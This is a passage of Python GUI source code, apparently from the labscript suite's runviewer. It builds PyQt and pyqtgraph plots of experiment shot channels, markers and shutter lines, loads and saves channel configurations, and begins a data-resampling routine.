self.ui.shot_treeview.resizeColumnToContents(1)
self.shot_model.itemChanged.connect(self.on_shot_selection_changed)
self.shot_colour_delegate = ColourDelegate(self.ui.shot_treeview)
self.ui.shot_treeview.setItemDelegateForColumn(0, self.shot_colour_delegate)
# setup channel treeview model
self.channel_model = QStandardItemModel()
self.channel_model.setHorizontalHeaderLabels(['channel'])
self.ui.channel_treeview.setModel(self.channel_model)
self.channel_model.itemChanged.connect(self.update_plots)
# create a hidden plot widget that all plots can link their x-axis too
hidden_plot = pg.PlotWidget(name='runviewer - time axis link')
hidden_plot.setMinimumHeight(1)
hidden_plot.setMaximumHeight(1)
hidden_plot.setLabel('bottom', 'Time', units='s')
hidden_plot.setLabel('left', " ")
hidden_plot.showAxis('right', True)
hidden_plot_item = hidden_plot.plot([0, 1], [0, 0])
self._hidden_plot = (hidden_plot, hidden_plot_item)
self.ui.hidden_plot_layout.addWidget(hidden_plot)
time_axis_plot = pg.PlotWidget()
time_axis_plot.setMinimumHeight(120)
time_axis_plot.setMaximumHeight(120)
time_axis_plot.setLabel('bottom', 'Time', units='s')
time_axis_plot.showAxis('right', True)
time_axis_plot.setXLink('runviewer - time axis link')
time_axis_plot.setMouseEnabled(y=False)
time_axis_plot.getAxis('left').setTicks([]) # hide y ticks in the left & right side. only show time axis
time_axis_plot.getAxis('right').setTicks([])
time_axis_plot.setLabel('left', 'Slots')
time_axis_plot.scene().sigMouseMoved.connect(lambda pos: self.mouseMovedEvent(pos, time_axis_plot, "Slots"))
time_axis_plot_item = time_axis_plot.plot([0, 1], [0, 0], pen=(255, 255, 255))
self._time_axis_plot = (time_axis_plot, time_axis_plot_item)
self.all_markers = {}
self.all_marker_items = {}
self.movable_marker_items = {}
markers_plot = pg.PlotWidget(name='runviewer - markers')
markers_plot.setMinimumHeight(120)
markers_plot.setMaximumHeight(120)
markers_plot.showAxis('top', False)
markers_plot.showAxis('bottom', False)
markers_plot.showAxis('left', True)
markers_plot.showAxis('right', True)
markers_plot.getAxis('left').setTicks([])
markers_plot.getAxis('right').setTicks([])
markers_plot.setLabel('left', 'Markers')
markers_plot.setXLink('runviewer - time axis link')
markers_plot.setMouseEnabled(y=False)
markers_plot.scene().sigMouseMoved.connect(lambda pos: self.mouseMovedEvent(pos, markers_plot, "Markers"))
markers_plot_item = markers_plot.plot([])
self._markers_plot = (markers_plot, markers_plot_item)
self.ui.verticalLayout_9.insertWidget(1,markers_plot)
self.ui.plot_layout.addWidget(time_axis_plot)
# add some icons
self.ui.add_shot.setIcon(QIcon(':/qtutils/fugue/plus'))
self.ui.remove_shots.setIcon(QIcon(':/qtutils/fugue/minus'))
self.ui.enable_selected_shots.setIcon(QIcon(':/qtutils/fugue/ui-check-box'))
self.ui.disable_selected_shots.setIcon(QIcon(':/qtutils/fugue/ui-check-box-uncheck'))
self.ui.group_channel.setIcon(QIcon(':/qtutils/fugue/layers-group'))
self.ui.delete_group.setIcon(QIcon(':/qtutils/fugue/layers-ungroup'))
self.ui.channel_move_to_top.setIcon(QIcon(':/qtutils/fugue/arrow-stop-090'))
self.ui.channel_move_up.setIcon(QIcon(':/qtutils/fugue/arrow-090'))
self.ui.channel_move_down.setIcon(QIcon(':/qtutils/fugue/arrow-270'))
self.ui.channel_move_to_bottom.setIcon(QIcon(':/qtutils/fugue/arrow-stop-270'))
self.ui.reset_x_axis.setIcon(QIcon(':/qtutils/fugue/layer-resize-replicate'))
self.ui.reset_y_axis.setIcon(QIcon(':/qtutils/fugue/layer-resize-replicate-vertical'))
self.ui.toggle_tooltip.setIcon(QIcon(':/qtutils/fugue/ui-tooltip-balloon'))
self.ui.linear_time.setIcon(QIcon(':/qtutils/fugue/clock-history'))
self.ui.equal_space_time.setIcon(QIcon(':/qtutils/fugue/border-vertical-all'))
self.ui.linear_time.setEnabled(False)
self.ui.equal_space_time.setEnabled(False)
self.ui.actionOpen_Shot.setIcon(QIcon(':/qtutils/fugue/plus'))
self.ui.actionQuit.setIcon(QIcon(':/qtutils/fugue/cross-button'))
self.ui.actionLoad_channel_config.setIcon(QIcon(':/qtutils/fugue/folder-open'))
self.ui.actionSave_channel_config.setIcon(QIcon(':/qtutils/fugue/disk'))
# disable buttons that are not yet implemented to help avoid confusion!
self.ui.group_channel.setEnabled(False)
self.ui.delete_group.setEnabled(False)
# connect signals
self.ui.reset_x_axis.clicked.connect(self.on_x_axis_reset)
self.ui.reset_y_axis.clicked.connect(self.on_y_axes_reset)
self.ui.channel_move_up.clicked.connect(self._move_up)
self.ui.channel_move_down.clicked.connect(self._move_down)
self.ui.channel_move_to_top.clicked.connect(self._move_top)
self.ui.channel_move_to_bottom.clicked.connect(self._move_bottom)
self.ui.enable_selected_shots.clicked.connect(self._enable_selected_shots)
self.ui.disable_selected_shots.clicked.connect(self._disable_selected_shots)
self.ui.add_shot.clicked.connect(self.on_add_shot)
self.ui.markers_comboBox.currentIndexChanged.connect(self._update_markers)
# self.ui.non_linear_time.toggled.connect(self._toggle_non_linear_time)
self.ui.linear_time.clicked.connect(self._reset_linear_time)
self.ui.equal_space_time.clicked.connect(self._space_markers_evenly)
self.ui.remove_shots.clicked.connect(self.on_remove_shots)
self.ui.actionOpen_Shot.triggered.connect(self.on_add_shot)
self.ui.actionQuit.triggered.connect(self.ui.close)
self.ui.actionLoad_channel_config.triggered.connect(self.on_load_channel_config)
self.ui.actionSave_channel_config.triggered.connect(self.on_save_channel_config)
if os.name == 'nt':
self.ui.newWindow.connect(set_win_appusermodel)
self.ui.show()
# internal variables
#self._channels_list = {}
self.plot_widgets = {}
self.plot_items = {}
self.shutter_lines = {}
try:
self.default_config_path = os.path.join(exp_config.get('DEFAULT', 'app_saved_configs'), 'runviewer')
except LabConfig.NoOptionError:
exp_config.set('DEFAULT', 'app_saved_configs', os.path.join('%(labscript_suite)s', 'userlib', 'app_saved_configs', '%(experiment_name)s'))
self.default_config_path = os.path.join(exp_config.get('DEFAULT', 'app_saved_configs'), 'runviewer')
if not os.path.exists(self.default_config_path):
os.makedirs(self.default_config_path)
self.last_opened_shots_folder = exp_config.get('paths', 'experiment_shot_storage')
# start resample thread
self._resample = False
self._thread = threading.Thread(target=self._resample_thread)
self._thread.daemon = True
self._thread.start()
# start shots_to_process_queue monitoring thread
self._shots_to_process_thread = threading.Thread(target=self._process_shots)
self._shots_to_process_thread.daemon = True
self._shots_to_process_thread.start()
self.scale_time = False
self.scalehandler = None
def _update_markers(self, index):
for line, plot in self.all_marker_items.items():
# line.blockSignals(True)
plot.removeItem(line)
self.all_marker_items = {}
for line, plot in self.movable_marker_items.items():
# line.blockSignals(True)
plot.removeItem(line)
self.movable_marker_items = {}
self.marker_times_unscaled = {}
marker_index = self.ui.markers_comboBox.currentIndex()
shot = self.ui.markers_comboBox.itemData(marker_index)
if index == 0:
self.ui.linear_time.setEnabled(False)
self.ui.equal_space_time.setEnabled(False)
self.all_markers = {}
else:
self.ui.linear_time.setEnabled(True)
self.ui.equal_space_time.setEnabled(True)
self.all_markers = shot.markers
# self._update_non_linear_time(changed_shot=True)
times = sorted(list(self.all_markers.keys()))
last_time = 0
for i, (t, m) in enumerate(sorted(self.all_markers.items())):
if i < len(times)-1:
delta_t = times[i+1] - t
# Now always have a marker at stop time
# else:
# delta_t = shot.stop_time - t
unscaled_t = t
if self.scale_time:
t = self.scalehandler.get_scaled_time(t)
color = m['color']
color = QColor(color[0], color[1], color[2])
label = m['label'].decode() if isinstance( m['label'], bytes) else str(m['label'])
if i == 0:
line = self._markers_plot[0].addLine(x=t, pen=pg.mkPen(color=color, width=1.5, style=Qt.DashLine), label=label, labelOpts= {"color": color, "fill": QColor(255, 255, 255, 255), "rotateAxis":(1, 0), "anchors": [(0.5, 0),(0.5, 0)]}, movable=False )
else:
line = self._markers_plot[0].addLine(x=t, pen=pg.mkPen(color=color, width=1.5, style=Qt.DashLine), label=label, labelOpts= {"color": color, "fill": QColor(255, 255, 255, 255), "rotateAxis":(1, 0), "anchors": [(0.5, 0),(0.5, 0)]}, movable=True )
line.setBounds([last_time+1e-9 if last_time !=0 else last_time ,None])
line.sigPositionChanged.connect(self._marker_moving)
line.sigPositionChangeFinished.connect(self._marker_moved)
# self.all_marker_items[line] = self._markers_plot[0]
self.movable_marker_items[line] = self._markers_plot[0]
self.marker_times_unscaled[line] = unscaled_t
line = self._time_axis_plot[0].addLine(x=t, pen=pg.mkPen(color=color, width=1.5, style=Qt.DashLine), label=format_time(delta_t), labelOpts= {"color": color, "fill": QColor(255, 255, 255, 255), "rotateAxis":(1, 0), "anchors": [(0.5, 0),(0.5, 0)]}, movable=False )
self.all_marker_items[line] = self._time_axis_plot[0]
last_time = t
self.update_plots()
def mouseMovedEvent(self, position, ui, name):
if self.ui.toggle_tooltip.isChecked():
v = ui.scene().views()[0]
viewP = v.mapFromScene(position)
glob_pos = ui.mapToGlobal(viewP) # convert to Screen x
glob_zero = ui.mapToGlobal(QPoint(0, 0))
self._global_start_x = glob_zero.x()
self._global_start_y = glob_zero.y()
self._global_width = ui.width()
self._global_height = ui.height()
coord_pos = ui.plotItem.vb.mapSceneToView(position)
if len(self.get_selected_shots_and_colours()) > 0:
scaled_t = float(coord_pos.x())
if self.scale_time and self.scalehandler is not None:
unscaled_t = float(self.scalehandler.get_unscaled_time(scaled_t))
else:
unscaled_t = scaled_t
if unscaled_t is not None:
pos = QPoint(glob_pos.x(), glob_pos.y())
plot_data = ui.plotItem.listDataItems()[0].getData()
if plot_data[0] is not None and scaled_t is not None:
nearest_index = numpy.abs(plot_data[0] - scaled_t).argmin() - 1
y_val = "{:.2f}".format(plot_data[1][nearest_index])
else:
y_val = '-'
text = "Plot: {} \nTime: {:.9f}s\nValue: {}".format(name, unscaled_t, y_val)
QToolTip.showText(pos, text)
def _reset_linear_time(self):
self.scale_time = False
markers_unscaled = sorted(list(self.all_markers.keys()))
marker_index = self.ui.markers_comboBox.currentIndex()
shot = self.ui.markers_comboBox.itemData(marker_index)
scalehandler = ScaleHandler(markers_unscaled, markers_unscaled, shot.stop_time)
self._update_non_linear_time(new_scalehandler=scalehandler)
self.on_x_axis_reset()
self._resample = True
def _space_markers_evenly(self):
self.scale_time = True
marker_index = self.ui.markers_comboBox.currentIndex()
shot = self.ui.markers_comboBox.itemData(marker_index)
markers_unscaled = sorted(list(self.all_markers.keys()))
target_length = shot.stop_time / float(len(markers_unscaled) - 1)
scaled_times = [target_length * i for i in range(len(markers_unscaled))]
scalehandler = ScaleHandler(markers_unscaled, scaled_times, shot.stop_time)
self._update_non_linear_time(new_scalehandler=scalehandler)
self.on_x_axis_reset()
self._resample = True
def _marker_moving(self, line):
self.scale_time = True
marker_index = self.ui.markers_comboBox.currentIndex()
shot = self.ui.markers_comboBox.itemData(marker_index)
markers_unscaled = sorted(list(self.all_markers.keys()))
# What was the unscaled time of the marker that moved, and where is it now?
moved_marker_unscaled_t = self.marker_times_unscaled[line]
moved_marker_new_pos = line.pos().x()
# Where was the marker just before it was moved? This is given by the current scalehandler
if self.scalehandler is not None:
moved_marker_last_pos = self.scalehandler.get_scaled_time(moved_marker_unscaled_t)
else:
moved_marker_last_pos = moved_marker_unscaled_t
# How far has the marker moved?
delta_marker = moved_marker_new_pos - moved_marker_last_pos
# Now we want to shift the other markers if the are at a higher position than this one
markers = list(self.marker_times_unscaled.keys())
new_scaled_times = []
for marker in markers:
if marker == line:
new_scaled_times.append(moved_marker_new_pos)
else:
x = marker.pos().x()
if x > moved_marker_last_pos:
x += delta_marker
new_scaled_times.append(x)
new_scaled_times = sorted(new_scaled_times)
scalehandler = ScaleHandler(markers_unscaled,new_scaled_times, shot.stop_time)
self._update_non_linear_time(new_scalehandler=scalehandler)
def _marker_moved(self, line):
self._resample = True
def _update_non_linear_time(self, changed_shot=False, new_scalehandler=None):
marker_index = self.ui.markers_comboBox.currentIndex()
shot = self.ui.markers_comboBox.itemData(marker_index)
if new_scalehandler is None:
# make a 1:1 scalehandler using the hidden_plot
self.scale_time = False
end_t = self._hidden_plot[1].getData()[0][-1]
new_scalehandler = ScaleHandler([0,end_t],[0,end_t],end_t)
old_scalehandler = self.scalehandler
self.scalehandler = new_scalehandler
# combine markers and shutter lines
markers = list(self.all_marker_items.keys())
for channel in self.shutter_lines:
for shot in self.shutter_lines[channel]:
for line in self.shutter_lines[channel][shot][0]:
markers.append(line)
for line in self.shutter_lines[channel][shot][1]:
markers.append(line)
# Move all Markes/Shutter Lines to new position
for marker in markers:
pos = marker.pos()
if old_scalehandler is None:
unscaled_x = pos.x()
else:
unscaled_x = old_scalehandler.get_unscaled_time(pos.x())
if self.scale_time and self.scalehandler is not None:
new_x = self.scalehandler.get_scaled_time(unscaled_x)
else:
new_x = unscaled_x
pos.setX(new_x)
marker.setPos(pos)
# Move the movable lines in the upper graph
mv_markers = list(self.movable_marker_items.keys())
new_marker_times = {}
for marker in mv_markers:
if self.scale_time and self.scalehandler is not None:
new_x = self.scalehandler.get_scaled_time(self.marker_times_unscaled[marker])
else:
new_x = self.marker_times_unscaled[marker]
new_marker_times[float(new_x)] = marker
last_time = None
for t in sorted(list(new_marker_times.keys())):
marker = new_marker_times[t]
marker.blockSignals(True)
marker.setBounds([None, None])
marker.setPos(t)
marker.setBounds([last_time+1e-9 if last_time is not None else 0.0, None])
marker.blockSignals(False)
last_time = t
if shot is not None and self.scale_time:
self._time_axis_plot[0].getAxis("bottom").setTicks([[[0, 0], [shot.stop_time, shot.stop_time]]])
for plot in self.plot_widgets.values():
plot.getAxis("bottom").setTicks([[[0, 0], [shot.stop_time, shot.stop_time]]])
else:
self._time_axis_plot[0].getAxis("bottom").setTicks(None)
for plot in self.plot_widgets.values():
plot.getAxis("bottom").setTicks(None)
for plot in self.plot_widgets.values():
for item in plot.getPlotItem().items:
if isinstance(item, pg.PlotDataItem):
if old_scalehandler is not None:
unscaled_t = old_scalehandler.get_unscaled_time(item.xData)
else:
unscaled_t = item.xData
if self.scalehandler is not None:
item.setData(self.scalehandler.get_scaled_time(unscaled_t), item.yData)
else:
item.setData(unscaled_t, item.yData)
def _process_shots(self):
while True:
filepath = shots_to_process_queue.get()
inmain_later(self.load_shot, filepath)
def on_load_channel_config(self):
config_file = QFileDialog.getOpenFileName(self.ui, "Select file to load", self.default_config_path, "Config files (*.ini)")
if isinstance(config_file, tuple):
config_file, _ = config_file
if config_file:
runviewer_config = LabConfig(config_file)
try:
channels = ast.literal_eval(runviewer_config.get('runviewer_state', 'Channels'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
channels = {}
for row, (channel, checked) in enumerate(channels):
check_items = self.channel_model.findItems(channel)
if len(check_items) == 0:
items = []
check_item = QStandardItem(channel)
check_item.setEditable(False)
check_item.setCheckable(True)
items.append(check_item)
check_item.setCheckState(Qt.Checked if checked else Qt.Unchecked)
check_item.setEnabled(False)
self.channel_model.insertRow(row, items)
else:
check_item = check_items[0]
check_item.setCheckState(Qt.Checked if checked else Qt.Unchecked)
self.channel_model.takeRow(check_item.row())
self.channel_model.insertRow(row, check_item)
def on_save_channel_config(self):
save_file = QFileDialog.getSaveFileName(self.ui, 'Select file to save current channel configuration', self.default_config_path, "config files (*.ini)")
if type(save_file) is tuple:
save_file, _ = save_file
if save_file:
runviewer_config = LabConfig(save_file)
channels = []
for row in range(self.channel_model.rowCount()):
item = self.channel_model.item(row)
channels.append((item.text(), item.checkState() == Qt.Checked))
runviewer_config.set('runviewer_state', 'Channels', pprint.pformat(channels))
def on_toggle_shutter(self, checked, current_shot):
for channel in self.shutter_lines:
for shot in self.shutter_lines[channel]:
if shot == current_shot:
for line in self.shutter_lines[channel][shot][0]:
if checked:
line.show()
else:
line.hide()
for line in self.shutter_lines[channel][shot][1]:
if checked:
line.show()
else:
line.hide()
def on_add_shot(self):
selected_files = QFileDialog.getOpenFileNames(self.ui, "Select file to load", self.last_opened_shots_folder, "HDF5 files (*.h5 *.hdf5)")
popup_warning = False
if isinstance(selected_files, tuple):
selected_files, _ = selected_files
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
selected_files = [os.path.abspath(str(shot_file)) for shot_file in selected_files]
if len(selected_files) > 0:
self.last_opened_shots_folder = os.path.dirname(selected_files[0])
for file in selected_files:
try:
filepath = str(file)
# Qt has this weird behaviour where if you type in the name of a file that exists
# but does not have the extension you have limited the dialog to, the OK button is greyed out
# but you can hit enter and the file will be selected.
# So we must check the extension of each file here!
if filepath.endswith('.h5') or filepath.endswith('.hdf5'):
self.load_shot(filepath)
else:
popup_warning = True
except:
popup_warning = True
raise
if popup_warning:
message = QMessageBox()
message.setText("Warning: Some shots were not loaded because they were not valid hdf5 files")
message.setIcon(QMessageBox.Warning)
message.setWindowTitle("Runviewer")
message.setStandardButtons(QMessageBox.Ok)
message.exec_()
def on_remove_shots(self):
# Get the selection model from the treeview
selection_model = self.ui.shot_treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in selection_model.selectedRows()]
# sort in descending order to prevent index changes of rows to be deleted
selected_row_list.sort(reverse=True)
reply = QMessageBox.question(self.ui, 'Runviewer', 'Remove {} shots?'.format(len(selected_row_list)),
QMessageBox.Yes | QMessageBox.No)
if reply == QMessageBox.No:
return
for row in selected_row_list:
item = self.shot_model.item(row, SHOT_MODEL__CHECKBOX_INDEX)
colour_item = self.shot_model.item(row, SHOT_MODEL__COLOUR_INDEX)
shutter_item = self.shot_model.item(row, SHOT_MODEL__SHUTTER_INDEX)
shot = item.data()
# unselect shot
item.setCheckState(Qt.Unchecked)
shutter_item.setCheckState(Qt.Unchecked)
# remove row
self.shot_model.removeRow(row)
del shot
def on_shot_selection_changed(self, item):
if self.shot_model.indexFromItem(item).column() == SHOT_MODEL__CHECKBOX_INDEX:
# add or remove a colour for this shot
checked = item.checkState()
row = self.shot_model.indexFromItem(item).row()
colour_item = self.shot_model.item(row, SHOT_MODEL__COLOUR_INDEX)
check_shutter = self.shot_model.item(row, SHOT_MODEL__SHUTTER_INDEX)
if checked:
colour = colour_item.data(Qt.UserRole)
if colour is not None:
colour = colour()
else:
colour = self.shot_colour_delegate.get_next_colour()
colour_item.setEditable(True)
pixmap = QPixmap(20, 20)
pixmap.fill(colour)
icon = QIcon(pixmap)
colour_item.setData(lambda clist=self.shot_colour_delegate._colours, colour=colour: int_to_enum(clist, colour), Qt.UserRole)
colour_item.setData(icon, Qt.DecorationRole)
shot_combobox_index = self.ui.markers_comboBox.findText(os.path.basename(item.data().path))
self.ui.markers_comboBox.model().item(shot_combobox_index).setEnabled(True)
if self.ui.markers_comboBox.currentIndex() == 0:
self.ui.markers_comboBox.setCurrentIndex(shot_combobox_index)
if item.data().shutter_times != {}:
check_shutter.setEnabled(True)
else:
check_shutter.setEnabled(False)
check_shutter.setToolTip("This shot doesn't contain shutter markers")
else:
# colour = None
# icon = None
shot_combobox_index = self.ui.markers_comboBox.findText(os.path.basename(item.data().path))
self.ui.markers_comboBox.model().item(shot_combobox_index).setEnabled(False)
if shot_combobox_index == self.ui.markers_comboBox.currentIndex():
self.ui.markers_comboBox.setCurrentIndex(0)
colour_item.setEditable(False)
check_shutter.setEnabled(False)
# model.setData(index, editor.itemIcon(editor.currentIndex()),
# model.setData(index, editor.itemData(editor.currentIndex()), Qt.UserRole)
self.update_channels_treeview()
elif self.shot_model.indexFromItem(item).column() == SHOT_MODEL__COLOUR_INDEX:
# update the plot colours
# get reference to the changed shot
current_shot = self.shot_model.item(self.shot_model.indexFromItem(item).row(), SHOT_MODEL__CHECKBOX_INDEX).data()
# find and update the pen of the plot items
for channel in self.plot_items.keys():
for shot in self.plot_items[channel]:
if shot == current_shot:
colour = item.data(Qt.UserRole)
self.plot_items[channel][shot].setPen(pg.mkPen(QColor(colour()), width=2))
elif self.shot_model.indexFromItem(item).column() == SHOT_MODEL__SHUTTER_INDEX:
current_shot = self.shot_model.item(self.shot_model.indexFromItem(item).row(), SHOT_MODEL__CHECKBOX_INDEX).data()
self.on_toggle_shutter(item.checkState(), current_shot)
def load_shot(self, filepath):
shot = Shot(filepath)
# add shot to shot list
# Create Items
items = []
colour_item = QStandardItem('')
colour_item.setEditable(False)
colour_item.setToolTip('Double-click to change colour')
items.append(colour_item)
check_shutter = QStandardItem()
check_shutter.setCheckable(True)
check_shutter.setCheckState(Qt.Unchecked) # options are Qt.Checked OR Qt.Unchecked
check_shutter.setEnabled(False)
check_shutter.setToolTip("Toggle shutter markers")
items.append(check_shutter)
check_item = QStandardItem(shot.path)
check_item.setEditable(False)
check_item.setCheckable(True)
check_item.setCheckState(Qt.Unchecked) # options are Qt.Checked OR Qt.Unchecked
check_item.setData(shot)
check_item.setToolTip(filepath)
items.append(check_item)
# script name
# path_item = QStandardItem(shot.path)
# path_item.setEditable(False)
# items.append(path_item)
self.shot_model.appendRow(items)
self.ui.markers_comboBox.addItem(os.path.basename(shot.path), shot)
shot_combobox_index = self.ui.markers_comboBox.findText(os.path.basename(shot.path))
self.ui.markers_comboBox.model().item(shot_combobox_index).setEnabled(False)
# only do this if we are checking the shot we are adding
# self.update_channels_treeview()
def get_selected_shots_and_colours(self):
# get the ticked shots
ticked_shots = {}
for i in range(self.shot_model.rowCount()):
item = self.shot_model.item(i, SHOT_MODEL__CHECKBOX_INDEX)
colour_item = self.shot_model.item(i, SHOT_MODEL__COLOUR_INDEX)
shutter_item = self.shot_model.item(i, SHOT_MODEL__SHUTTER_INDEX)
if item.checkState() == Qt.Checked:
shot = item.data()
colour_item_data = colour_item.data(Qt.UserRole)
ticked_shots[shot] = (colour_item_data(), shutter_item.checkState())
return ticked_shots
def update_channels_treeview(self):
ticked_shots = self.get_selected_shots_and_colours()
# get set of channels
channels = {}
for shot in ticked_shots.keys():
channels[shot] = set(shot.channels)
channels_set = frozenset().union(*channels.values())
# now find channels in channels_set which are not in the treeview, and add them
# now find channels in channels set which are already in the treeview, but deactivated, and activate them
treeview_channels_dict = {}
deactivated_treeview_channels_dict = {}
for i in range(self.channel_model.rowCount()):
item = self.channel_model.item(i, CHANNEL_MODEL__CHECKBOX_INDEX)
# Sanity check
if str(item.text()) in treeview_channels_dict:
raise RuntimeError("A duplicate channel name was detected in the treeview due to an internal error. Please lodge a bugreport detailing how the channels with the same name appeared in the channel treeview. Please restart the application")
treeview_channels_dict[str(item.text())] = i
if not item.isEnabled():
deactivated_treeview_channels_dict[str(item.text())] = i
treeview_channels = set(treeview_channels_dict.keys())
deactivated_treeview_channels = set(deactivated_treeview_channels_dict.keys())
# speed up working with self.channel_model by blocking signals and later reenabeling them
self.channel_model.blockSignals(True)
# find list of channels to work with
channels_to_add = channels_set.difference(treeview_channels)
for channel in sorted(channels_to_add):
items = []
check_item = QStandardItem(channel)
check_item.setEditable(False)
check_item.setCheckable(True)
check_item.setCheckState(Qt.Unchecked)
items.append(check_item)
# channel_name_item = QStandardItem(channel)
# channel_name_item.setEditable(False)
# items.append(channel_name_item)
self.channel_model.appendRow(items)
channels_to_reactivate = deactivated_treeview_channels.intersection(channels_set)
for channel in channels_to_reactivate:
for i in range(self.channel_model.columnCount()):
item = self.channel_model.item(deactivated_treeview_channels_dict[channel], i)
item.setEnabled(True)
item.setSelectable(True)
# now find channels in the treeview which are not in the channels_set and deactivate them
channels_to_deactivate = treeview_channels.difference(channels_set)
for channel in channels_to_deactivate:
for i in range(self.channel_model.columnCount()):
item = self.channel_model.item(treeview_channels_dict[channel], i)
item.setEnabled(False)
item.setSelectable(False)
self.channel_model.blockSignals(False)
self.channel_model.layoutChanged.emit()
# TODO: Also update entries in groups
self.update_plots()
def update_plots(self):
# get list of selected shots
ticked_shots = self.get_selected_shots_and_colours()
# SHould we rescale the x-axis?
# if self._hidden_plot[0].getViewBox.getState()['autoRange'][0]:
# self._hidden_plot[0].enableAutoRange(axis=pg.ViewBox.XAxis)
# else:
# self._hidden_plot[0].enableAutoRange(axis=pg.ViewBox.XAxis, enable=False)
# find stop time of longest ticked shot
largest_stop_time = 0
stop_time_set = False
for shot in ticked_shots.keys():
if self.scale_time:
st = self.scalehandler.get_scaled_time(shot.stop_time)
else:
st = shot.stop_time
if st > largest_stop_time:
largest_stop_time = st
stop_time_set = True
if not stop_time_set:
largest_stop_time = 1.0
# Update the range of the link plot
self._hidden_plot[1].setData([0, largest_stop_time], [0, 1e-9])
# Update plots
for i in range(self.channel_model.rowCount()):
check_item = self.channel_model.item(i, CHANNEL_MODEL__CHECKBOX_INDEX)
channel = str(check_item.text())
if check_item.checkState() == Qt.Checked and check_item.isEnabled():
# we want to show this plot
# does a plot already exist? If yes, show it
if channel in self.plot_widgets:
self.plot_widgets[channel].show()
# update the plot
# are there are plot items for this channel which are shown that should not be?
to_delete = []
for shot in self.plot_items[channel]:
if shot not in ticked_shots.keys():
self.plot_widgets[channel].removeItem(self.plot_items[channel][shot])
# Remove Shutter Markers of unticked Shots
if shot in self.shutter_lines[channel]:
for line in self.shutter_lines[channel][shot][0]:
self.plot_widgets[channel].removeItem(line)
for line in self.shutter_lines[channel][shot][1]:
self.plot_widgets[channel].removeItem(line)
self.shutter_lines[channel].pop(shot)
to_delete.append(shot)
for shot in to_delete:
del self.plot_items[channel][shot]
# do we need to add any plot items for shots that were not previously selected?
for shot, (colour, shutters_checked) in ticked_shots.items():
if shot not in self.plot_items[channel]:
# plot_item = self.plot_widgets[channel].plot(shot.traces[channel][0], shot.traces[channel][1], pen=pg.mkPen(QColor(colour), width=2))
# Add empty plot as it the custom resampling we do will happen quicker if we don't attempt to first plot all of the data
plot_item = self.plot_widgets[channel].plot([0, 0], [0], pen=pg.mkPen(QColor(colour), width=2), stepMode=True)
self.plot_items[channel][shot] = plot_item
# Add Shutter Markers of newly ticked Shots
self.add_shutter_markers(shot, channel, shutters_checked)
for t, m in self.all_markers.items():
color = m['color']
color = QColor(color[0], color[1], color[2])
if self.scale_time and self.scalehandler is not None:
t = self.scalehandler.get_scaled_time(t)
line = self.plot_widgets[channel].addLine(x=t, pen=pg.mkPen(color=color, width=1.5, style=Qt.DashLine))
self.all_marker_items[line] = self.plot_widgets[channel]
# If no, create one
else:
self.create_plot(channel, ticked_shots)
else:
if channel not in self.plot_widgets:
self.create_plot(channel, ticked_shots)
self.plot_widgets[channel].hide()
self._resample = True
def create_plot(self, channel, ticked_shots):
self.plot_widgets[channel] = pg.PlotWidget() # name=channel)
self.plot_widgets[channel].setMinimumHeight(200)
self.plot_widgets[channel].setMaximumHeight(200)
self.plot_widgets[channel].setLabel('bottom', 'Time', units='s')
self.plot_widgets[channel].showAxis('right', True)
self.plot_widgets[channel].showAxis('bottom', True)
self.plot_widgets[channel].setXLink('runviewer - time axis link')
self.plot_widgets[channel].sigXRangeChanged.connect(self.on_x_range_changed)
self.plot_widgets[channel].scene().sigMouseMoved.connect(lambda pos: self.mouseMovedEvent(pos, self.plot_widgets[channel], channel))
self.ui.plot_layout.insertWidget(self.ui.plot_layout.count() - 1, self.plot_widgets[channel])
self.shutter_lines[channel] = {} # initialize Storage for shutter lines
self.plot_items.setdefault(channel, {})
has_units = False
units = ''
for shot, (colour, shutters_checked) in ticked_shots.items():
if channel in shot.traces:
# plot_item = self.plot_widgets[channel].plot(shot.traces[channel][0], shot.traces[channel][1], pen=pg.mkPen(QColor(colour), width=2))
# Add empty plot as it the custom resampling we do will happen quicker if we don't attempt to first plot all of the data
plot_item = self.plot_widgets[channel].plot([0, 0], [0], pen=pg.mkPen(QColor(colour), width=2), stepMode=True)
self.plot_items[channel][shot] = plot_item
if len(shot.traces[channel]) == 3:
has_units = True
units = shot.traces[channel][2]
# Add Shutter Markers of ticked Shots
self.add_shutter_markers(shot, channel, shutters_checked)
if has_units:
self.plot_widgets[channel].setLabel('left', channel, units=units)
else:
self.plot_widgets[channel].setLabel('left', channel)
def add_shutter_markers(self, shot, channel, shutters_checked):
if shot not in self.shutter_lines[channel] and channel in shot.shutter_times:
self.shutter_lines[channel][shot] = [[], []]
open_color = QColor(0, 255, 0)
close_color = QColor(255, 0, 0)
for t, val in shot.shutter_times[channel].items():
scaled_t = t
if val: # val != 0, shutter open
line = self.plot_widgets[channel].addLine(x=scaled_t, pen=pg.mkPen(color=open_color, width=4., style=Qt.DotLine))
self.shutter_lines[channel][shot][1].append(line)
if not shutters_checked:
line.hide()
else: # else shutter close
line = self.plot_widgets[channel].addLine(x=scaled_t, pen=pg.mkPen(color=close_color, width=4., style=Qt.DotLine))
self.shutter_lines[channel][shot][0].append(line)
if not shutters_checked:
line.hide()
def on_x_range_changed(self, *args):
# print 'x range changed'
self._resample = True
@inmain_decorator(wait_for_return=True)
def _get_resample_params(self, channel, shot):
rect = self.plot_items[channel][shot].getViewBox().viewRect()
xmin, xmax = rect.left(), rect.width() + rect.left()
dx = xmax - xmin
view_range = self.plot_widgets[channel].viewRange()
return view_range[0][0], view_range[0][1], dx
def resample(self, data_x, data_y, xmin, xmax, stop_time, num_pixels):
"""This is a function for downsampling the data before plotting
it. Unlike using nearest neighbour interpolation, this method
preserves the features of the plot. It chooses what value to
use based on what values within a region are most different
from the values it's already chosen. This way, spikes of a short
duration won't just be skipped over as they would with any sort
of interpolation."""
# TODO: Only finely sample the currently visible region. Coarsely sample the rest
# x_out = numpy.float32(numpy.linspace(data_x[0], data_x[-1], 4000*(data_x[-1]-data_x[0])/(xmax-xmin)))
x_out = numpy.float64(numpy.linspace(xmin, xmax, 3 * 2000 + 2))
y_out = numpy.empty(len(x_out) - 1, dtype=numpy.float64)
data_x = numpy.float64(data_x)
data_y = numpy.float64(data_y)
# TODO: investigate only resampling when necessary.
# Currently pyqtgraph sometimes has trouble rendering things
# if you don't resample. If a point is far off the graph,
# and this point is the first that should be drawn for stepMode,
# because there is a long gap before the next point (which is
# visible) then there is a problem.
# Also need to explicitly handle cases where none of the data
# is visible (which resampling does by setting NaNs)
#
